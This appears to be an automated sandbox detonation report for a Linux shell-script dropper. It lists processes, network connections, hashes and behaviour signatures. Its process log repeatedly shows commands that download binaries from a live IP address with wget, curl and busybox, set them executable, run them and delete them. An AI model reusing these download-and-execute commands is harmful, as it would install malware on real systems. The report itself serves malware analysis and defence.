[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

Network

Country Destination Domain Proto
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
N/A 224.0.0.251:5353 udp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
GB 89.187.167.9:443 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:39

Reported

2024-11-20 03:43

Platform

debian9-armhf-20240611-en

Max time kernel

54s

Max time network

96s

Command Line

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc N/A
N/A /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU N/A
N/A /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX N/A
N/A /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 N/A
N/A /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 N/A
N/A /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ N/A
N/A /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc N/A
N/A /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv N/A
N/A /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd N/A
N/A /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A
N/A /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN N/A
N/A /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t N/A
N/A /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK N/A
N/A /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t /usr/bin/curl N/A
File opened for modification /tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK /usr/bin/curl N/A
File opened for modification /tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7 /usr/bin/curl N/A
File opened for modification /tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp /usr/bin/curl N/A
File opened for modification /tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc /usr/bin/curl N/A
File opened for modification /tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv /usr/bin/curl N/A
File opened for modification /tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd /usr/bin/curl N/A
File opened for modification /tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7 /usr/bin/curl N/A
File opened for modification /tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ /usr/bin/curl N/A
File opened for modification /tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU /usr/bin/curl N/A
File opened for modification /tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D /usr/bin/curl N/A
File opened for modification /tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc /usr/bin/curl N/A
File opened for modification /tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX /usr/bin/curl N/A

Processes

/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh

[/tmp/e51e88e5779218a53250cdc2404b6664515c6ca70a827448aabba4fb4a819849.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/chmod

[chmod 777 THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/tmp/THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc

[./THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/bin/rm

[rm THBIo5phde6bGC2Cvjbkba2vFKNevaXdZc]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/chmod

[chmod 777 dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/tmp/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU

[./dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/bin/rm

[rm dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

/usr/bin/wget

[wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/chmod

[chmod 777 O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/tmp/O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX

[./O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/bin/rm

[rm O6qcVEW61xfEqvZ31dpIXqEMuUisyD2MMX]

/usr/bin/wget

[wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/chmod

[chmod 777 rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/tmp/rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7

[./rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/bin/rm

[rm rccpZc5VfMnig4HRCYGvDbDvCNXo8wMLc7]

/usr/bin/wget

[wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/chmod

[chmod 777 UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/tmp/UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7

[./UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/bin/rm

[rm UF3lCOLfK6v8kLJp8u6rJNpSDxoKdEzmY7]

/usr/bin/wget

[wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/chmod

[chmod 777 gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/tmp/gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ

[./gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/bin/rm

[rm gVKl1SRCsFYPVyimBibLrTCa94zZtIMQvJ]

/usr/bin/wget

[wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/chmod

[chmod 777 BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/tmp/BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc

[./BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/bin/rm

[rm BJUox2gIsBI7sL8S5F83lW5Nu3x5QCJqSc]

/usr/bin/wget

[wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/chmod

[chmod 777 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/tmp/3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv

[./3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/bin/rm

[rm 3YsjI5BxdwNggxF6y4NYCpzpTndvzhAORv]

/usr/bin/wget

[wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/chmod

[chmod 777 pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/tmp/pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd

[./pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/bin/rm

[rm pgaMBzYn7aqyZGsctrzZ88VsEperOnMqZd]

/usr/bin/wget

[wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/chmod

[chmod 777 ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/tmp/ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp

[./ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/bin/rm

[rm ffcEbBaAqOvhYwSL3QBxKMyCrSIz0bFPbp]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/chmod

[chmod 777 QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/tmp/QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN

[./QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/bin/rm

[rm QguHJaFjb5SgpwtSdmGuTSc4ku2CkBtINN]

/usr/bin/wget

[wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/chmod

[chmod 777 QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/tmp/QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t

[./QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/bin/rm

[rm QyLVsn0SD0ZuYlkIwNkMMyAR4bIxdQma0t]

/usr/bin/wget

[wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/chmod

[chmod 777 wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/tmp/wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK

[./wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/bin/rm

[rm wpmftFt8uM3Se6NIlUS6sGzFfVsIyIOjrK]

/usr/bin/wget

[wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/chmod

[chmod 777 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/tmp/9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D

[./9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/bin/rm

[rm 9AFuZHFcRiUnW0IIFQXAHtFsQsPpROnF7D]

/usr/bin/wget

[wget http://216.126.231.240/bins/dA1JT0DKwqvKeHKSKsIvy81Mh2zL1o8nkU]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
